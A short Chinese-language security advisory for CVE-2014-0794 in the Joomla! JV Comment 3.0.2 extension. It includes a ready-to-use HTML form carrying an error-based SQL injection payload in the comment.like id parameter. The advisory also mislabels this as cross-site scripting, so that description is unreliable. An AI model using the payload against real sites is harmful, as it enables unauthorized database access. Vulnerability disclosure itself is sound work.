BUGTRAQ ID: 64661
CVE(CAN) ID: CVE-2014-0794
JV Comment是Joomla!的一个扩展,可以将评论系统添加到文章内。
JV Comment for Joomla!(版本3.0.2),文件com_jvcomment在实现上存在跨站脚本漏洞,这可使远程攻击者在comment.like操作的id参数,利用此漏洞注入任意Web脚本或HTML,从而查看、添加、修改、删除后端数据库内的信息。
0
Joomla! JV Comment 3.0.2
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
The following exploitation example displays version of MySQL database:
<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="option" value="com_jvcomment">
<input type="hidden" name="task" value="comment.like">
<input type="hidden" name="id" value="1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))">
<input type="submit" id="btn">
</form>